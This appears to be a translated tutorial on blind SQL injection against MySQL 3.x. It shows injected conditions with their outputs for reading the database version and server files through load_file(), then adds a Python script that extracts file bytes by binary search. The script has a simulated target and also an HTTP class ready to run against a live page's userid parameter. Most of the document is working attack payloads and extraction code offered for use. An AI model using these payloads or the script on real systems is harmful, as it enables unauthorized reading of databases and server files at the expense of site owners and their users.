MySQL 3.0 injection
MySQL injection mostly relies on UNION queries, but UNION is only available from version 4.0 on; MySQL 3.x and older simply do not have it.
So on a MySQL 3.x database a cross-table read via UNION is impossible, but load_file() is still available.
load_file() cannot simply stand in for UNION, though: with no way to echo its output, each condition has to be answered by whether the page returns a row or not. Here is my approach:
Get the version (a false condition returns no row, a true one returns the row):
mysql> select * from user where userid=1 and length(version())<10;
Empty set (0.00 sec)
mysql> select * from user where userid=1 and length(version())<1777;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      1 | angel    | mypass   |
+--------+----------+----------+
1 row in set (0.00 sec)
Get the current database:
mysql> select * from user where userid=1 and length(database())>0;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      1 | angel    | mypass   |
+--------+----------+----------+
1 row in set (0.00 sec)
Brute-forcing the file contents, one byte at a time:
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/'),1,1))<1;
Empty set (0.05 sec)
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/'),1,1))>1;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      1 | angel    | mypass   |
+--------+----------+----------+
1 row in set (0.00 sec)
Because the workload is large, this has to be scripted (and even then it is tedious).
Another idea: first use the string functions to find the position of a known marker. When brute-forcing a file, pick a string you expect in it, such as "localhost" (or anything else), find which byte it starts at, and then guess only the bytes near that position; this saves a great deal of work.
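The procedure above, scripted, as an added example that is not code from the original page: each condition is answered only by whether the row comes back, so the file size, the position of the marker and every byte are recovered by binary search instead of a linear guess. The target path, the marker string and the HTTP injection point (userid=1 and <condition>, row present iff a known username appears in the response) are assumptions; the run below uses a constructed in-memory file so it works offline. One caveat the page does not mention: load_file() returns NULL when the database user lacks the FILE privilege or the path is unreadable, and a comparison against NULL never returns the row, so the script checks the upper bound before searching.

```python
"""Boolean-based blind extraction of load_file() output, byte by byte (added example)."""
from typing import Callable


class SimulatedOracle:
    """Answers the page's three conditions against a constructed byte string,
    with MySQL semantics: locate() is 1-based and 0 when absent, and
    ascii(mid(s, pos, 1)) is 0 past the end of the string."""

    def __init__(self, content: bytes) -> None:
        self.content = content
        self.queries = 0  # number of "page requests" the extraction costs

    def file_len_lt(self, n: int) -> bool:  # length(load_file(p)) < n
        self.queries += 1
        return len(self.content) < n

    def locate_lt(self, needle: str, n: int) -> bool:  # locate(needle, load_file(p)) < n
        self.queries += 1
        return self.content.find(needle.encode()) + 1 < n

    def byte_lt(self, pos: int, n: int) -> bool:  # ascii(mid(load_file(p), pos, 1)) < n
        self.queries += 1
        value = self.content[pos - 1] if 1 <= pos <= len(self.content) else 0
        return value < n


class HttpOracle:
    """Same interface against a live page. Assumed (hypothetical) injection
    point: GET url?userid=1 and <condition>; the row is present iff `marker`
    (e.g. the username) appears in the body. Not exercised offline."""

    def __init__(self, url: str, path: str, marker: str) -> None:
        self.url, self.path, self.marker = url, path, marker

    def _ask(self, condition: str) -> bool:
        import urllib.parse
        import urllib.request
        query = urllib.parse.urlencode({"userid": f"1 and {condition}"})
        with urllib.request.urlopen(f"{self.url}?{query}") as resp:
            return self.marker in resp.read().decode("latin-1")

    def file_len_lt(self, n: int) -> bool:
        return self._ask(f"length(load_file('{self.path}'))<{n}")

    def locate_lt(self, needle: str, n: int) -> bool:
        return self._ask(f"locate('{needle}',load_file('{self.path}'))<{n}")

    def byte_lt(self, pos: int, n: int) -> bool:
        return self._ask(f"ascii(mid(load_file('{self.path}'),{pos},1))<{n}")


def bsearch(value_lt: Callable[[int], bool], lo: int, hi: int) -> int:
    """Recover the integer v with lo <= v < hi from a 'v < n' oracle in
    about log2(hi - lo) queries instead of a linear scan."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if value_lt(mid):
            hi = mid
        else:
            lo = mid
    return lo


def file_size(oracle, max_len: int = 1 << 20) -> int:
    # NULL < n is never true, so an unreadable file would make every answer
    # false and the search would silently return max_len - 1: check first.
    if not oracle.file_len_lt(max_len):
        raise RuntimeError("load_file() returned NULL or the file exceeds max_len")
    return bsearch(oracle.file_len_lt, 0, max_len)


def landmark_position(oracle, needle: str, size: int) -> int:
    """1-based offset of the marker string in the file, 0 if absent."""
    return bsearch(lambda n: oracle.locate_lt(needle, n), 0, size + 1)


def read_bytes(oracle, start: int, end: int) -> bytes:
    """Bytes start..end (1-based, inclusive), eight queries per byte."""
    return bytes(bsearch(lambda n: oracle.byte_lt(p, n), 0, 256)
                 for p in range(start, end + 1))


def extract_around(oracle, needle: str, before: int = 16, after: int = 16) -> str:
    """Read only the bytes around a known marker rather than the whole file."""
    size = file_size(oracle)
    pos = landmark_position(oracle, needle, size)
    if pos == 0:
        return ""
    start = max(1, pos - before)
    end = min(size, pos + len(needle) - 1 + after)
    return read_bytes(oracle, start, end).decode("latin-1")


# Constructed stand-in for a hosts file; not data from any real system.
SAMPLE_FILE = b"# constructed hosts file\r\n127.0.0.1 localhost\r\n::1 localhost\r\n"

if __name__ == "__main__":
    sim = SimulatedOracle(SAMPLE_FILE)
    print(repr(extract_around(sim, "localhost", before=10, after=2)), sim.queries, "queries")
```

Swapping SimulatedOracle for HttpOracle keeps the extraction logic unchanged; only the way each true/false answer is obtained differs. Reading 21 bytes around "localhost" costs 8 requests per byte plus about 20 for the length and 6 for the marker position, against 62 bytes times 8 for the whole file.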